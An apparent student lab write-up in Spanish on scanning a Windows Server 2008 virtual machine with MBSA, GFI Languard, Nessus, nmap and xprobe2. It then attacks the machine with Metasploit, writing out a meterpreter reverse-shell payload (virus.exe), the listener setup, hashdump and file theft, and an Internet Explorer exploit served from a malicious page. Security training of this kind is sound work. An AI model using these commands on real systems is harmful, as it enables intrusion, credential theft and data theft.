instalar mbsa y gfi languard en windows server...
TRANSCRIPT
Actividad 4.
Instalar MBSA y GFI Languard en Windows Server 2008 y hacer un análisis.
· MBSA: instalamos Microsoft Baseline Security Analyzer (es gratis), y pulsamos en la opción “Scan a computer”.
· GFI Languard: nos descargamos la versión de prueba (265 MB) e instalamos GFI Languard (requerirá algunos componentes de Microsoft). Después de este tedioso proceso, abrimos el menú inicial de GFI Languard y pulsamos la opción de “Launch a Scan”, y esperamos varios minutos hasta que el escaneo se complete.
· Nessus: instalamos el programa Nessus descargando la versión “Home” desde la página web de Tenable. Para usarlo una vez instalado, debemos meternos en el navegador web y poner la dirección“https://localhost:8834/”. Antes de seguir, debemos registrarnos en la página oficial de Tenable paraque nos den la clave de registro de evaluación a través de e-mail. Para lanzar un escaneo, escribimos en el cuadro Target nuestra dirección IP que se puede ver fácilmente en la consola a través del comando ipconfig.
Escanear el anterior Server 2008 desde nmap
Para obtener los puertos abiertos, es necesario desactivar firewall de Windows Server 2008. Después nos vamos a Kali Linux y, desde un terminal, escribimos el comando “nmap [IP objetivo]”.
Para detectar los servicios, escribimos en la terminal el comando “nmap -sV [IP objetivo]”.
Para detectar el sistema operativo, escribimos en la terminal el comando “nmap -O [IP objetivo].
Escanear Server 2008 desde xprobe2.
Para descubrir los puertos abiertos, escribimos en la terminal el comando “xprobe2 -T,-U [rango de puertos a escanear] [IP objetivo]”. Por ejemplo, “xprobe2 -T,-U 135,139,445,49152-49156,50001 192.168.1.50”. El parámetro -T sirve para escanear puertos con protocolo TCP, mientras que -U sirve para los protocolos UDP.
Para detectar el Sistema Operativo, ponemos el comando “xprobe2 -B [IP objetivo]”.
Con Metasploit acceder al servidor.
Vamos a provocar un exploit en Windows Server 2008 usando Metasploit.
Para ello, vamos a Aplicaciones → Kali Linux → Servicios del sistema → Metasploit → community / pro start.
Se abrirá una terminal, y ejecutaremos el comando “msfconsole”.
Después el comando “search negotiate”.
Nos saldrá una lista como esta:
Ponemos el comando señalado en la imagen. Ahora configuramos con el comando “set”:
“set RHOST 192.168.1.50” → la IP del Server 2008, la víctima.“set PAYLOAD windows/meterpreter/reverse_tcp”“set LHOST 192.168.1.10” → la IP de Kali Linux, el atacante.
Y ahora ejecutamos el comando “exploit”. Esto provocará una sobrecarga en el Server 2008 y lo reiniciará, como vemos aquí:
Por desgracia, no hemos conseguido usar el meterpreter en el Server, que era lo que pretendíamos. Pero al menos podemos usar un exploit sencillo.
Para usar el meterpreter, primero debemos crear un archivo malicioso que contenga a meterpreter y, de alguna u otra forma, conseguir que dicho archivo malicioso se ejecute en Server 2008.
Primero, creamos el virus en Kali Linux: abrimos el terminal y ejecutamos: “msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 X > virus.exe” Recordemos que LHOST es la dirección IP de Kali Linux mediante la cual hace ping a Server 2008.
En VirtualBox, hemos enviado el archivo virus.exe a través de las carpetas compartidas.
Continuamos en Kali Linux, y ejecutamos el comando “msfconsole”. Esperamos a que se cargue, y ejecutamos el comando “use exploit/multi/handler/”.
“set LHOST 192.168.1.10” → la IP de Kali Linux.“set LPORT 4444”“set PAYLOAD windows/meterpreter/reverse_tcp”
Y ahora, ejecutamos “exploit”.
Aparecerá una espera en la terminal, lo que está esperando es que el archivo virus.exe que se envió previamente a Server 2008 se ejecute. Una vez ejecutemos el archivo virus.exe en Server 2008, podemos obtener información de él, como por ejemplo, el comando “sysinfo”:
Meterpreter es un módulo que permite manipular la máquina vulnerada a nuestro antojo. Por ejemplo, podemos ver sus procesos actuales con “ps”, hacer pantallazos de la máquina vulnerada con “screenshot”, crear directorios con “mkdir” y “ls”, obtener el listado de usuarios con “hashdump”,...
Por ejemplo, para descargar la carpeta “Users” que está en C:/Users de Server 2008, ponemos en Meterpreter el comando “download Users”, y en breve tendremos dicha carpeta en nuestra carpeta personal de Kali Linux:
Usando Armitage en Windows 7 y en Internet Explorer 8
Vamos a crear una página web maliciosa donde se ejecute Meterpreter a través de Internet Explorer 8.
Primero, en Kali Linux nos vamos al menú “Aplicaciones” → “Kali Linux” → “Servicios del Sistema” → “Metasploit” → “community / pro start”.
Esto ejecutará los servicios que necesitamos para usar Armitage.
Ahora con la terminal abierta, iniciamos Armitage con “armitage”. Si no hemos tocado nada, nos debería salir:
Host: 127.0.0.1Port: 55553User: msfPass: test
Aceptamos, y si no tenemos acceso a Internet, nos preguntará cual es la IP del equipo atacante. Debemos ponerle la IP de Kali Linux desde la cual hace ping a la víctima. Ya entramos en Armitage, pero sin ningún objetivo porque todavía no hemos escaneado nada. Nos vamos al menú de Armitage “Host” → “Nmap Scan” → “Quick Scan (OS detect)”. Y escribimos la IP de la víctima.
Ahora que tenemos a la víctima fijada, ya solo hace falta crear esa página web maliciosa que se ejecutará en el Internet Explorer de Windows 7.
En el buscador que aparece en la parte izquierda de Armitage, buscamos: “ms11_003_ie_css_import”, y hacemos doble click en él.
Es importante que, en la ventana emergente, pongamos como LHOST la dirección IP de Kali Linux,si es que no está puesto ya.
Si todo ha salido bien, aparecerá en consola “Server started” con una “Local IP”, indicando que estáa la escucha y esperando a que algún Internet Explorer abra esa “Local IP” que nos ha generado.
Sin embargo, hay un error de Armitage, y es que esa “Local IP” debe contener la dirección IP de Kali Linux mediante la cual hace ping a Windows 7.
Por ejemplo: si hemos obtenido en la consola de Armitage la siguiente dirección:
http://127.0.0.1:8080/cZPhhjR
Debemos sustituirla por:
http://192.168.1.10:8080/cZPhhjR
192.168.1.10 es la dirección IP que pusimos en LHOST y es la dirección con la que hace ping a Windows 7.
El reto consiste ahora que en el usuario de Windows 7 abra esa anterior dirección en su navegador de Internet Explorer.
Y ya podemos usar Meterpreter en Windows 7.